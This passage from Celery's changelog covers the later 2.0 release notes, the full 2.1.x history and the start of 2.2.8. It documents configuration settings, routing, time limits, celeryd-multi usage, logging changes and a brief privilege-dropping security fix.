SQLAlchemy. CELERY_RESULT_ENGINE_OPTIONS = {'echo': True} .. _`SQLAlchemy`: http://www.sqlalchemy.org .. _`Supported Databases`: http://www.sqlalchemy.org/docs/core/engines.html#supported-databases .. _`SQLAlchemy Connection String`: http://www.sqlalchemy.org/docs/core/engines.html#database-urls .. _`SQLAlchemy Connection Strings`: http://www.sqlalchemy.org/docs/core/engines.html#database-urls .. _v200-upgrade-cache: Cache result backend ~~~~~~~~~~~~~~~~~~~~ The cache result backend is no longer using the Django cache framework, but it supports mostly the same configuration syntax: .. code-block:: python CELERY_CACHE_BACKEND = 'memcached://A.example.com:11211;B.example.com' To use the cache backend you must either have the :pypi:`pylibmc` or :pypi:`python-memcached` library installed, of which the former is regarded as the best choice. The support backend types are `memcached://` and `memory://`, we haven't felt the need to support any of the other backends provided by Django. .. _v200-incompatible: Backward incompatible changes ----------------------------- * Default (python) loader now prints warning on missing `celeryconfig.py` instead of raising :exc:`ImportError`. The worker raises :exc:`~@ImproperlyConfigured` if the configuration isn't set up. 
This makes it possible to use `--help` etc., without having a working configuration. Also this makes it possible to use the client side of Celery without being configured: .. code-block:: pycon >>> from carrot.connection import BrokerConnection >>> conn = BrokerConnection('localhost', 'guest', 'guest', '/') >>> from celery.execute import send_task >>> r = send_task('celery.ping', args=(), kwargs={}, connection=conn) >>> from celery.backends.amqp import AMQPBackend >>> r.backend = AMQPBackend(connection=conn) >>> r.get() 'pong' * The following deprecated settings has been removed (as scheduled by the :ref:`deprecation-timeline`): ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== `CELERY_AMQP_CONSUMER_QUEUES` `CELERY_QUEUES` `CELERY_AMQP_EXCHANGE` `CELERY_DEFAULT_EXCHANGE` `CELERY_AMQP_EXCHANGE_TYPE` `CELERY_DEFAULT_EXCHANGE_TYPE` `CELERY_AMQP_CONSUMER_ROUTING_KEY` `CELERY_QUEUES` `CELERY_AMQP_PUBLISHER_ROUTING_KEY` `CELERY_DEFAULT_ROUTING_KEY` ===================================== ===================================== * The `celery.task.rest` module has been removed, use `celery.task.http` instead (as scheduled by the :ref:`deprecation-timeline`). * It's no longer allowed to skip the class name in loader names. (as scheduled by the :ref:`deprecation-timeline`): Assuming the implicit `Loader` class name is no longer supported, for example, if you use: .. code-block:: python CELERY_LOADER = 'myapp.loaders' You need to include the loader class name, like this: .. code-block:: python CELERY_LOADER = 'myapp.loaders.Loader' * :setting:`CELERY_TASK_RESULT_EXPIRES` now defaults to 1 day. Previous default setting was to expire in 5 days. * AMQP backend: Don't use different values for `auto_delete`. This bug became visible with RabbitMQ 1.8.0, which no longer allows conflicting declarations for the auto_delete and durable settings. If you've already used Celery with this backend chances are you have to delete the previous declaration: .. code-block:: console $ camqadm exchange.delete celeryresults * Now uses pickle instead of cPickle on Python versions <= 2.5 cPickle is broken in Python <= 2.5. It unsafely and incorrectly uses relative instead of absolute imports, so for example: .. code-block:: python exceptions.KeyError becomes: .. code-block:: python celery.exceptions.KeyError Your best choice is to upgrade to Python 2.6, as while the pure pickle version has worse performance, it is the only safe option for older Python versions. .. _v200-news: News ---- * **celeryev**: Curses Celery Monitor and Event Viewer. This is a simple monitor allowing you to see what tasks are executing in real-time and investigate tracebacks and results of ready tasks. It also enables you to set new rate limits and revoke tasks. Screenshot: .. figure:: ../images/celeryevshotsm.jpg If you run `celeryev` with the `-d` switch it will act as an event dumper, simply dumping the events it receives to standard out: .. code-block:: console $ celeryev -d -> celeryev: starting capture... 
casper.local [2010-06-04 10:42:07.020000] heartbeat casper.local [2010-06-04 10:42:14.750000] task received: tasks.add(61a68756-27f4-4879-b816-3cf815672b0e) args=[2, 2] kwargs={} eta=2010-06-04T10:42:16.669290, retries=0 casper.local [2010-06-04 10:42:17.230000] task started tasks.add(61a68756-27f4-4879-b816-3cf815672b0e) args=[2, 2] kwargs={} casper.local [2010-06-04 10:42:17.960000] task succeeded: tasks.add(61a68756-27f4-4879-b816-3cf815672b0e) args=[2, 2] kwargs={} result=4, runtime=0.782663106918 The fields here are, in order: *sender hostname*, *timestamp*, *event type* and *additional event fields*. * AMQP result backend: Now supports `.ready()`, `.successful()`, `.result`, `.status`, and even responds to changes in task state * New user guides: * :ref:`guide-workers` * :ref:`guide-canvas` * :ref:`guide-routing` * Worker: Standard out/error is now being redirected to the log file. * :pypi:`billiard` has been moved back to the Celery repository. ===================================== ===================================== **Module name** **celery equivalent** ===================================== ===================================== `billiard.pool` `celery.concurrency.processes.pool` `billiard.serialization` `celery.serialization` `billiard.utils.functional` `celery.utils.functional` ===================================== ===================================== The :pypi:`billiard` distribution may be maintained, depending on interest. * now depends on :pypi:`carrot` >= 0.10.5 * now depends on :pypi:`pyparsing` * Worker: Added `--purge` as an alias to `--discard`. * Worker: :kbd:`Control-c` (SIGINT) once does warm shutdown, hitting :kbd:`Control-c` twice forces termination. * Added support for using complex Crontab-expressions in periodic tasks. For example, you can now use: .. code-block:: pycon >>> crontab(minute='*/15') or even: .. code-block:: pycon >>> crontab(minute='*/30', hour='8-17,1-2', day_of_week='thu-fri') See :ref:`guide-beat`. * Worker: Now waits for available pool processes before applying new tasks to the pool. This means it doesn't have to wait for dozens of tasks to finish at shutdown because it has applied prefetched tasks without having any pool processes available to immediately accept them. See issue #122. * New built-in way to do task callbacks using :class:`~celery.subtask`. See :ref:`guide-canvas` for more information. * TaskSets can now contain several types of tasks. :class:`~celery.task.sets.TaskSet` has been refactored to use a new syntax, please see :ref:`guide-canvas` for more information. The previous syntax is still supported, but will be deprecated in version 1.4. * TaskSet failed() result was incorrect. See issue #132. * Now creates different loggers per task class. See issue #129. * Missing queue definitions are now created automatically. You can disable this using the :setting:`CELERY_CREATE_MISSING_QUEUES` setting. The missing queues are created with the following options: .. code-block:: python CELERY_QUEUES[name] = {'exchange': name, 'exchange_type': 'direct', 'routing_key': 'name} This feature is added for easily setting up routing using the `-Q` option to the worker: .. code-block:: console $ celeryd -Q video, image See the new routing section of the User Guide for more information: :ref:`guide-routing`. * New Task option: `Task.queue` If set, message options will be taken from the corresponding entry in :setting:`CELERY_QUEUES`. `exchange`, `exchange_type` and `routing_key` will be ignored * Added support for task soft and hard time limits. 
New settings added: * :setting:`CELERYD_TASK_TIME_LIMIT` Hard time limit. The worker processing the task will be killed and replaced with a new one when this is exceeded. * :setting:`CELERYD_TASK_SOFT_TIME_LIMIT` Soft time limit. The :exc:`~@SoftTimeLimitExceeded` exception will be raised when this is exceeded. The task can catch this to, for example, clean up before the hard time limit comes. New command-line arguments to ``celeryd`` added: `--time-limit` and `--soft-time-limit`. What's left? This won't work on platforms not supporting signals (and specifically the `SIGUSR1` signal) yet. So an alternative the ability to disable the feature all together on nonconforming platforms must be implemented. Also when the hard time limit is exceeded, the task result should be a `TimeLimitExceeded` exception. * Test suite is now passing without a running broker, using the carrot in-memory backend. * Log output is now available in colors. ===================================== ===================================== **Log level** **Color** ===================================== ===================================== `DEBUG` Blue `WARNING` Yellow `CRITICAL` Magenta `ERROR` Red ===================================== ===================================== This is only enabled when the log output is a tty. You can explicitly enable/disable this feature using the :setting:`CELERYD_LOG_COLOR` setting. * Added support for task router classes (like the django multi-db routers) * New setting: :setting:`CELERY_ROUTES` This is a single, or a list of routers to traverse when sending tasks. Dictionaries in this list converts to a :class:`celery.routes.MapRoute` instance. Examples: >>> CELERY_ROUTES = {'celery.ping': 'default', 'mytasks.add': 'cpu-bound', 'video.encode': { 'queue': 'video', 'exchange': 'media' 'routing_key': 'media.video.encode'}} >>> CELERY_ROUTES = ('myapp.tasks.Router', {'celery.ping': 'default'}) Where `myapp.tasks.Router` could be: .. code-block:: python class Router(object): def route_for_task(self, task, args=None, kwargs=None): if task == 'celery.ping': return 'default' route_for_task may return a string or a dict. A string then means it's a queue name in :setting:`CELERY_QUEUES`, a dict means it's a custom route. When sending tasks, the routers are consulted in order. The first router that doesn't return `None` is the route to use. The message options is then merged with the found route settings, where the routers settings have priority. Example if :func:`~celery.execute.apply_async` has these arguments: .. code-block:: pycon >>> Task.apply_async(immediate=False, exchange='video', ... routing_key='video.compress') and a router returns: .. code-block:: python {'immediate': True, 'exchange': 'urgent'} the final message options will be: .. code-block:: pycon >>> task.apply_async( ... immediate=True, ... exchange='urgent', ... routing_key='video.compress', ... ) (and any default message options defined in the :class:`~celery.task.base.Task` class) * New Task handler called after the task returns: :meth:`~celery.task.base.Task.after_return`. * :class:`~billiard.einfo.ExceptionInfo` now passed to :meth:`~celery.task.base.Task.on_retry`/ :meth:`~celery.task.base.Task.on_failure` as ``einfo`` keyword argument. * Worker: Added :setting:`CELERYD_MAX_TASKS_PER_CHILD` / ``celery worker --maxtasksperchild``. Defines the maximum number of tasks a pool worker can process before the process is terminated and replaced by a new one. 
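To make the new time-limit and max-tasks-per-child settings above concrete, here's a minimal sketch of a configuration plus a task that cleans up when the soft limit fires; the values, the ``process_upload`` task, and the ``do_work``/``remove_temp_files`` helpers are hypothetical:

.. code-block:: python

    # celeryconfig.py (illustrative values)
    CELERYD_TASK_TIME_LIMIT = 120        # hard limit, in seconds
    CELERYD_TASK_SOFT_TIME_LIMIT = 100   # soft limit, raises SoftTimeLimitExceeded
    CELERYD_MAX_TASKS_PER_CHILD = 50     # recycle each pool process after 50 tasks

    # tasks.py
    from celery.decorators import task
    from celery.exceptions import SoftTimeLimitExceeded

    @task()
    def process_upload(path, **kwargs):
        try:
            do_work(path)                # hypothetical long-running helper
        except SoftTimeLimitExceeded:
            # Soft limit hit: clean up before the hard limit kills the process.
            remove_temp_files(path)      # hypothetical helper
            raise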
* Revoked tasks now marked with state :state:`REVOKED`, and `result.get()` will now raise :exc:`~@TaskRevokedError`. * :func:`celery.task.control.ping` now works as expected. * `apply(throw=True)` / :setting:`CELERY_EAGER_PROPAGATES_EXCEPTIONS`: Makes eager execution re-raise task errors. * New signal: :signal:`~celery.signals.worker_process_init`: Sent inside the pool worker process at init. * Worker: :option:`celery worker -Q` option: Ability to specify list of queues to use, disabling other configured queues. For example, if :setting:`CELERY_QUEUES` defines four queues: `image`, `video`, `data` and `default`, the following command would make the worker only consume from the `image` and `video` queues: .. code-block:: console $ celeryd -Q image,video * Worker: New return value for the `revoke` control command: Now returns: .. code-block:: python {'ok': 'task $id revoked'} instead of :const:`True`. * Worker: Can now enable/disable events using remote control Example usage: >>> from celery.task.control import broadcast >>> broadcast('enable_events') >>> broadcast('disable_events') * Removed top-level tests directory. Test config now in celery.tests.config This means running the unit tests doesn't require any special setup. `celery/tests/__init__` now configures the :envvar:`CELERY_CONFIG_MODULE` and :envvar:`CELERY_LOADER` environment variables, so when `nosetests` imports that, the unit test environment is all set up. Before you run the tests you need to install the test requirements: .. code-block:: console $ pip install -r requirements/test.txt Running all tests: .. code-block:: console $ nosetests Specifying the tests to run: .. code-block:: console $ nosetests celery.tests.test_task Producing HTML coverage: .. code-block:: console $ nosetests --with-coverage3 The coverage output is then located in `celery/tests/cover/index.html`. * Worker: New option `--version`: Dump version info and exit. * :mod:`celeryd-multi `: Tool for shell scripts to start multiple workers. Some examples: - Advanced example with 10 workers: * Three of the workers processes the images and video queue * Two of the workers processes the data queue with loglevel DEBUG * the rest processes the default' queue. .. code-block:: console $ celeryd-multi start 10 -l INFO -Q:1-3 images,video -Q:4,5:data -Q default -L:4,5 DEBUG - Get commands to start 10 workers, with 3 processes each .. code-block:: console $ celeryd-multi start 3 -c 3 celeryd -n celeryd1.myhost -c 3 celeryd -n celeryd2.myhost -c 3 celeryd -n celeryd3.myhost -c 3 - Start 3 named workers .. code-block:: console $ celeryd-multi start image video data -c 3 celeryd -n image.myhost -c 3 celeryd -n video.myhost -c 3 celeryd -n data.myhost -c 3 - Specify custom hostname .. code-block:: console $ celeryd-multi start 2 -n worker.example.com -c 3 celeryd -n celeryd1.worker.example.com -c 3 celeryd -n celeryd2.worker.example.com -c 3 Additional options are added to each ``celeryd``, but you can also modify the options for ranges of or single workers - 3 workers: Two with 3 processes, and one with 10 processes. .. code-block:: console $ celeryd-multi start 3 -c 3 -c:1 10 celeryd -n celeryd1.myhost -c 10 celeryd -n celeryd2.myhost -c 3 celeryd -n celeryd3.myhost -c 3 - Can also specify options for named workers .. 
code-block:: console

      $ celeryd-multi start image video data -c 3 -c:image 10
      celeryd -n image.myhost -c 10
      celeryd -n video.myhost -c 3
      celeryd -n data.myhost -c 3

- Ranges and lists of workers in options are also allowed:
  (``-c:1-3`` can also be written as ``-c:1,2,3``)

  .. code-block:: console

      $ celeryd-multi start 5 -c 3 -c:1-3 10
      celeryd-multi -n celeryd1.myhost -c 10
      celeryd-multi -n celeryd2.myhost -c 10
      celeryd-multi -n celeryd3.myhost -c 10
      celeryd-multi -n celeryd4.myhost -c 3
      celeryd-multi -n celeryd5.myhost -c 3

- Lists also work with named workers:

  .. code-block:: console

      $ celeryd-multi start foo bar baz xuzzy -c 3 -c:foo,bar,baz 10
      celeryd-multi -n foo.myhost -c 10
      celeryd-multi -n bar.myhost -c 10
      celeryd-multi -n baz.myhost -c 10
      celeryd-multi -n xuzzy.myhost -c 3

* The worker now calls the result backend's `process_cleanup` method *after* task execution instead of before.

* AMQP result backend now supports Pika.

.. _changelog-2.1:

===============================
 Change history for Celery 2.1
===============================

.. contents::
    :local:

.. _version-2.1.4:

2.1.4
=====
:release-date: 2010-12-03 12:00 p.m. CEST
:release-by: Ask Solem

.. _v214-fixes:

Fixes
-----

* Execution options to `apply_async` now take precedence over options
  returned by active routers. This was a regression introduced recently
  (Issue #244).

* curses monitor: Long arguments are now truncated so curses doesn't crash
  with out-of-bounds errors (Issue #235).

* multi: Channel errors occurring while handling control commands no longer
  crash the worker but are instead logged with severity error.

* SQLAlchemy database backend: Fixed a race condition occurring when the
  client wrote the pending state. Just like the Django database backend,
  it no longer saves the pending state (Issue #261 + Issue #262).

* Error email body now uses `repr(exception)` instead of `str(exception)`,
  as the latter could result in Unicode decode errors (Issue #245).

* Error email timeout value is now configurable by using the
  :setting:`EMAIL_TIMEOUT` setting.

* `celeryev`: Now works on Windows (but the curses monitor won't work without
  having curses).

* Unit test output no longer emits non-standard characters.

* worker: The broadcast consumer is now closed if the connection is reset.

* worker: Now properly handles errors occurring while trying to acknowledge
  the message.

* `TaskRequest.on_failure` now encodes the traceback using the current
  file-system encoding (Issue #286).

* `EagerResult` can now be pickled (Issue #288).

.. _v214-documentation:

Documentation
-------------

* Added :ref:`contributing`.

* Added :ref:`guide-optimizing`.

* Added :ref:`faq-security` section to the FAQ.

.. _version-2.1.3:

2.1.3
=====
:release-date: 2010-11-09 05:00 p.m. CEST
:release-by: Ask Solem

.. _v213-fixes:

* Fixed deadlocks in `timer2` that could lead to `djcelerymon`/`celeryev -c`
  hanging.

* `EventReceiver`: now sends a heartbeat request to find workers.

  This means :program:`celeryev` and friends find workers immediately at
  start-up.

* ``celeryev`` curses monitor: Set screen_delay to 10ms, so the screen
  refreshes more often.

* Fixed pickling errors when pickling :class:`AsyncResult` on older Python
  versions.

* worker: prefetch count was decremented by ETA tasks even if there were
  no active prefetch limits.

..
_version-2.1.2: 2.1.2 ===== :release-data: TBA .. _v212-fixes: Fixes ----- * worker: Now sends the :event:`task-retried` event for retried tasks. * worker: Now honors ignore result for :exc:`~@WorkerLostError` and timeout errors. * ``celerybeat``: Fixed :exc:`UnboundLocalError` in ``celerybeat`` logging when using logging setup signals. * worker: All log messages now includes `exc_info`. .. _version-2.1.1: 2.1.1 ===== :release-date: 2010-10-14 02:00 p.m. CEST :release-by: Ask Solem .. _v211-fixes: Fixes ----- * Now working on Windows again. Removed dependency on the :mod:`pwd`/:mod:`grp` modules. * snapshots: Fixed race condition leading to loss of events. * worker: Reject tasks with an ETA that cannot be converted to a time stamp. See issue #209 * concurrency.processes.pool: The semaphore was released twice for each task (both at ACK and result ready). This has been fixed, and it is now released only once per task. * docs/configuration: Fixed typo `CELERYD_TASK_SOFT_TIME_LIMIT` -> :setting:`CELERYD_TASK_SOFT_TIME_LIMIT`. See issue #214 * control command `dump_scheduled`: was using old .info attribute * multi: Fixed `set changed size during iteration` bug occurring in the restart command. * worker: Accidentally tried to use additional command-line arguments. This would lead to an error like: `got multiple values for keyword argument 'concurrency'`. Additional command-line arguments are now ignored, and doesn't produce this error. However -- we do reserve the right to use positional arguments in the future, so please don't depend on this behavior. * ``celerybeat``: Now respects routers and task execution options again. * ``celerybeat``: Now reuses the publisher instead of the connection. * Cache result backend: Using :class:`float` as the expires argument to `cache.set` is deprecated by the Memcached libraries, so we now automatically cast to :class:`int`. * unit tests: No longer emits logging and warnings in test output. .. _v211-news: News ---- * Now depends on carrot version 0.10.7. * Added :setting:`CELERY_REDIRECT_STDOUTS`, and :setting:`CELERYD_REDIRECT_STDOUTS_LEVEL` settings. :setting:`CELERY_REDIRECT_STDOUTS` is used by the worker and beat. All output to `stdout` and `stderr` will be redirected to the current logger if enabled. :setting:`CELERY_REDIRECT_STDOUTS_LEVEL` decides the log level used and is :const:`WARNING` by default. * Added :setting:`CELERYBEAT_SCHEDULER` setting. This setting is used to define the default for the -S option to :program:`celerybeat`. Example: .. code-block:: python CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler' * Added Task.expires: Used to set default expiry time for tasks. * New remote control commands: `add_consumer` and `cancel_consumer`. .. method:: add_consumer(queue, exchange, exchange_type, routing_key, \*\*options) :module: Tells the worker to declare and consume from the specified declaration. .. method:: cancel_consumer(queue_name) :module: Tells the worker to stop consuming from queue (by queue name). Commands also added to :program:`celeryctl` and :class:`~celery.task.control.inspect`. Example using ``celeryctl`` to start consuming from queue "queue", in exchange "exchange", of type "direct" using binding key "key": .. code-block:: console $ celeryctl inspect add_consumer queue exchange direct key $ celeryctl inspect cancel_consumer queue See :ref:`monitoring-control` for more information about the :program:`celeryctl` program. Another example using :class:`~celery.task.control.inspect`: .. 
code-block:: pycon >>> from celery.task.control import inspect >>> inspect.add_consumer(queue='queue', exchange='exchange', ... exchange_type='direct', ... routing_key='key', ... durable=False, ... auto_delete=True) >>> inspect.cancel_consumer('queue') * ``celerybeat``: Now logs the traceback if a message can't be sent. * ``celerybeat``: Now enables a default socket timeout of 30 seconds. * ``README``/introduction/homepage: Added link to `Flask-Celery`_. .. _`Flask-Celery`: https://github.com/ask/flask-celery .. _version-2.1.0: 2.1.0 ===== :release-date: 2010-10-08 12:00 p.m. CEST :release-by: Ask Solem .. _v210-important: Important Notes --------------- * Celery is now following the versioning semantics defined by `semver`_. This means we're no longer allowed to use odd/even versioning semantics By our previous versioning scheme this stable release should've been version 2.2. .. _`semver`: http://semver.org * Now depends on Carrot 0.10.7. * No longer depends on SQLAlchemy, this needs to be installed separately if the database result backend is used. * :pypi:`django-celery` now comes with a monitor for the Django Admin interface. This can also be used if you're not a Django user. (Update: Django-Admin monitor has been replaced with Flower, see the Monitoring guide). * If you get an error after upgrading saying: `AttributeError: 'module' object has no attribute 'system'`, Then this is because the `celery.platform` module has been renamed to `celery.platforms` to not collide with the built-in :mod:`platform` module. You have to remove the old :file:`platform.py` (and maybe :file:`platform.pyc`) file from your previous Celery installation. To do this use :program:`python` to find the location of this module: .. code-block:: console $ python >>> import celery.platform >>> celery.platform Here the compiled module is in :file:`/opt/devel/celery/celery/`, to remove the offending files do: .. code-block:: console $ rm -f /opt/devel/celery/celery/platform.py* .. _v210-news: News ---- * Added support for expiration of AMQP results (requires RabbitMQ 2.1.0) The new configuration option :setting:`CELERY_AMQP_TASK_RESULT_EXPIRES` sets the expiry time in seconds (can be int or float): .. code-block:: python CELERY_AMQP_TASK_RESULT_EXPIRES = 30 * 60 # 30 minutes. CELERY_AMQP_TASK_RESULT_EXPIRES = 0.80 # 800 ms. * ``celeryev``: Event Snapshots If enabled, the worker sends messages about what the worker is doing. These messages are called "events". The events are used by real-time monitors to show what the cluster is doing, but they're not very useful for monitoring over a longer period of time. Snapshots lets you take "pictures" of the clusters state at regular intervals. This can then be stored in a database to generate statistics with, or even monitoring over longer time periods. :pypi:`django-celery` now comes with a Celery monitor for the Django Admin interface. To use this you need to run the :pypi:`django-celery` snapshot camera, which stores snapshots to the database at configurable intervals. To use the Django admin monitor you need to do the following: 1. Create the new database tables: .. code-block:: console $ python manage.py syncdb 2. Start the :pypi:`django-celery` snapshot camera: .. code-block:: console $ python manage.py celerycam 3. Open up the django admin to monitor your cluster. The admin interface shows tasks, worker nodes, and even lets you perform some actions, like revoking and rate limiting tasks, and shutting down worker nodes. 
There's also a Debian init.d script for :mod:`~celery.bin.events` available, see :ref:`daemonizing` for more information. New command-line arguments to ``celeryev``: * :option:`celery events --camera`: Snapshot camera class to use. * :option:`celery events --logfile`: Log file * :option:`celery events --loglevel`: Log level * :option:`celery events --maxrate`: Shutter rate limit. * :option:`celery events --freq`: Shutter frequency The :option:`--camera ` argument is the name of a class used to take snapshots with. It must support the interface defined by :class:`celery.events.snapshot.Polaroid`. Shutter frequency controls how often the camera thread wakes up, while the rate limit controls how often it will actually take a snapshot. The rate limit can be an integer (snapshots/s), or a rate limit string which has the same syntax as the task rate limit strings (`"200/m"`, `"10/s"`, `"1/h",` etc). For the Django camera case, this rate limit can be used to control how often the snapshots are written to the database, and the frequency used to control how often the thread wakes up to check if there's anything new. The rate limit is off by default, which means it will take a snapshot for every :option:`--frequency ` seconds. * :func:`~celery.task.control.broadcast`: Added callback argument, this can be used to process replies immediately as they arrive. * ``celeryctl``: New command line utility to manage and inspect worker nodes, apply tasks and inspect the results of tasks. .. seealso:: The :ref:`monitoring-control` section in the :ref:`guide`. Some examples: .. code-block:: console $ celeryctl apply tasks.add -a '[2, 2]' --countdown=10 $ celeryctl inspect active $ celeryctl inspect registered_tasks $ celeryctl inspect scheduled $ celeryctl inspect --help $ celeryctl apply --help * Added the ability to set an expiry date and time for tasks. Example:: >>> # Task expires after one minute from now. >>> task.apply_async(args, kwargs, expires=60) >>> # Also supports datetime >>> task.apply_async(args, kwargs, ... expires=datetime.now() + timedelta(days=1) When a worker receives a task that's been expired it will be marked as revoked (:exc:`~@TaskRevokedError`). * Changed the way logging is configured. We now configure the root logger instead of only configuring our custom logger. In addition we don't hijack the multiprocessing logger anymore, but instead use a custom logger name for different applications: ===================================== ===================================== **Application** **Logger Name** ===================================== ===================================== ``celeryd`` ``"celery"`` ``celerybeat`` ``"celery.beat"`` ``celeryev`` ``"celery.ev"`` ===================================== ===================================== This means that the `loglevel` and `logfile` arguments will affect all registered loggers (even those from third-party libraries). Unless you configure the loggers manually as shown below, that is. *Users can choose to configure logging by subscribing to the :signal:`~celery.signals.setup_logging` signal:* .. code-block:: python from logging.config import fileConfig from celery import signals @signals.setup_logging.connect def setup_logging(**kwargs): fileConfig('logging.conf') If there are no receivers for this signal, the logging subsystem will be configured using the :option:`--loglevel `/ :option:`--logfile ` arguments, this will be used for *all defined loggers*. 
Remember that the worker also redirects stdout and stderr to the Celery logger, if manually configure logging you also need to redirect the standard outs manually: .. code-block:: python from logging.config import fileConfig from celery import log def setup_logging(**kwargs): import logging fileConfig('logging.conf') stdouts = logging.getLogger('mystdoutslogger') log.redirect_stdouts_to_logger(stdouts, loglevel=logging.WARNING) * worker Added command line option :option:`--include `: A comma separated list of (task) modules to be imported. Example: .. code-block:: console $ celeryd -I app1.tasks,app2.tasks * worker: now emits a warning if running as the root user (euid is 0). * :func:`celery.messaging.establish_connection`: Ability to override defaults used using keyword argument "defaults". * worker: Now uses `multiprocessing.freeze_support()` so that it should work with **py2exe**, **PyInstaller**, **cx_Freeze**, etc. * worker: Now includes more meta-data for the :state:`STARTED` state: PID and host name of the worker that started the task. See issue #181 * subtask: Merge additional keyword arguments to `subtask()` into task keyword arguments. For example: .. code-block:: pycon >>> s = subtask((1, 2), {'foo': 'bar'}, baz=1) >>> s.args (1, 2) >>> s.kwargs {'foo': 'bar', 'baz': 1} See issue #182. * worker: Now emits a warning if there's already a worker node using the same name running on the same virtual host. * AMQP result backend: Sending of results are now retried if the connection is down. * AMQP result backend: `result.get()`: Wait for next state if state isn't in :data:`~celery.states.READY_STATES`. * TaskSetResult now supports subscription. :: >>> res = TaskSet(tasks).apply_async() >>> res[0].get() * Added `Task.send_error_emails` + `Task.error_whitelist`, so these can be configured per task instead of just by the global setting. * Added `Task.store_errors_even_if_ignored`, so it can be changed per Task, not just by the global setting. * The Crontab scheduler no longer wakes up every second, but implements `remaining_estimate` (*Optimization*). * worker: Store :state:`FAILURE` result if the :exc:`~@WorkerLostError` exception occurs (worker process disappeared). * worker: Store :state:`FAILURE` result if one of the `*TimeLimitExceeded` exceptions occurs. * Refactored the periodic task responsible for cleaning up results. * The backend cleanup task is now only added to the schedule if :setting:`CELERY_TASK_RESULT_EXPIRES` is set. * If the schedule already contains a periodic task named "celery.backend_cleanup" it won't change it, so the behavior of the backend cleanup task can be easily changed. * The task is now run every day at 4:00 AM, rather than every day since the first time it was run (using Crontab schedule instead of `run_every`) * Renamed `celery.task.builtins.DeleteExpiredTaskMetaTask` -> :class:`celery.task.builtins.backend_cleanup` * The task itself has been renamed from "celery.delete_expired_task_meta" to "celery.backend_cleanup" See issue #134. * Implemented `AsyncResult.forget` for SQLAlchemy/Memcached/Redis/Tokyo Tyrant backends (forget and remove task result). See issue #184. * :meth:`TaskSetResult.join `: Added 'propagate=True' argument. When set to :const:`False` exceptions occurring in subtasks will not be re-raised. * Added `Task.update_state(task_id, state, meta)` as a shortcut to `task.backend.store_result(task_id, meta, state)`. 
The backend interface is "private" and the terminology outdated, so better to move this to :class:`~celery.task.base.Task` so it can be used. * timer2: Set `self.running=False` in :meth:`~celery.utils.timer2.Timer.stop` so it won't try to join again on subsequent calls to `stop()`. * Log colors are now disabled by default on Windows. * `celery.platform` renamed to :mod:`celery.platforms`, so it doesn't collide with the built-in :mod:`platform` module. * Exceptions occurring in Mediator+Pool callbacks are now caught and logged instead of taking down the worker. * Redis result backend: Now supports result expiration using the Redis `EXPIRE` command. * unit tests: Don't leave threads running at tear down. * worker: Task results shown in logs are now truncated to 46 chars. * `Task.__name__` is now an alias to `self.__class__.__name__`. This way tasks introspects more like regular functions. * `Task.retry`: Now raises :exc:`TypeError` if kwargs argument is empty. See issue #164. * ``timedelta_seconds``: Use ``timedelta.total_seconds`` if running on Python 2.7 * :class:`~kombu.utils.limits.TokenBucket`: Generic Token Bucket algorithm * :mod:`celery.events.state`: Recording of cluster state can now be paused and resumed, including support for buffering. .. method:: State.freeze(buffer=True) Pauses recording of the stream. If `buffer` is true, events received while being frozen will be buffered, and may be replayed later. .. method:: State.thaw(replay=True) Resumes recording of the stream. If `replay` is true, then the recorded buffer will be applied. .. method:: State.freeze_while(fun) With a function to apply, freezes the stream before, and replays the buffer after the function returns. * :meth:`EventReceiver.capture ` Now supports a timeout keyword argument. * worker: The mediator thread is now disabled if :setting:`CELERY_RATE_LIMITS` is enabled, and tasks are directly sent to the pool without going through the ready queue (*Optimization*). .. _v210-fixes: Fixes ----- * Pool: Process timed out by `TimeoutHandler` must be joined by the Supervisor, so don't remove it from the internal process list. See issue #192. * `TaskPublisher.delay_task` now supports exchange argument, so exchange can be overridden when sending tasks in bulk using the same publisher See issue #187. * the worker no longer marks tasks as revoked if :setting:`CELERY_IGNORE_RESULT` is enabled. See issue #207. * AMQP Result backend: Fixed bug with `result.get()` if :setting:`CELERY_TRACK_STARTED` enabled. `result.get()` would stop consuming after receiving the :state:`STARTED` state. * Fixed bug where new processes created by the pool supervisor becomes stuck while reading from the task Queue. See http://bugs.python.org/issue10037 * Fixed timing issue when declaring the remote control command reply queue This issue could result in replies being lost, but have now been fixed. * Backward compatible `LoggerAdapter` implementation: Now works for Python 2.4. Also added support for several new methods: `fatal`, `makeRecord`, `_log`, `log`, `isEnabledFor`, `addHandler`, `removeHandler`. .. _v210-experimental: Experimental ------------ * multi: Added daemonization support. multi can now be used to start, stop and restart worker nodes: .. code-block:: console $ celeryd-multi start jerry elaine george kramer This also creates PID files and log files (:file:`celeryd@jerry.pid`, ..., :file:`celeryd@jerry.log`. To specify a location for these files use the `--pidfile` and `--logfile` arguments with the `%n` format: .. 
code-block:: console

      $ celeryd-multi start jerry elaine george kramer \
          --logfile=/var/log/celeryd@%n.log \
          --pidfile=/var/run/celeryd@%n.pid

  Stopping:

  .. code-block:: console

      $ celeryd-multi stop jerry elaine george kramer

  Restarting. The nodes will be restarted one by one as the old ones
  are shut down:

  .. code-block:: console

      $ celeryd-multi restart jerry elaine george kramer

  Killing the nodes (**WARNING**: Will discard currently executing tasks):

  .. code-block:: console

      $ celeryd-multi kill jerry elaine george kramer

  See `celeryd-multi help` for help.

* multi: `start` command renamed to `show`.

  `celeryd-multi start` will now actually start and detach worker nodes.
  To just generate the commands you have to use `celeryd-multi show`.

* worker: Added `--pidfile` argument.

  The worker will write its pid when it starts. The worker will not be
  started if this file exists and the pid contained is still alive.

* Added generic init.d script using `celeryd-multi`:

  https://github.com/celery/celery/tree/master/extra/generic-init.d/celeryd

.. _v210-documentation:

Documentation
-------------

* Added User guide section: Monitoring

* Added User guide section: Periodic Tasks

  Moved from `getting-started/periodic-tasks` and updated.

* tutorials/external moved to new section: "community".

* References have been added to all sections in the documentation.

  This makes it easier to link between documents.

.. _changelog-2.2:

===============================
 Change history for Celery 2.2
===============================

.. contents::
    :local:

.. _version-2.2.8:

2.2.8
=====
:release-date: 2011-11-25 04:00 p.m. GMT
:release-by: Ask Solem

.. _v228-security-fixes:

Security Fixes
--------------

* [Security: `CELERYSA-0001`_] Daemons would set effective id's rather than
  real id's when the :option:`--uid`/:option:`--gid` arguments to
  :program:`celery multi`, :program:`celeryd_detach`, :program:`celery beat`
  and :program:`celery events` were used.

  This means privileges weren't properly dropped, and that it would be
  possible to regain supervisor privileges later.

.. _`CELERYSA-0001`:
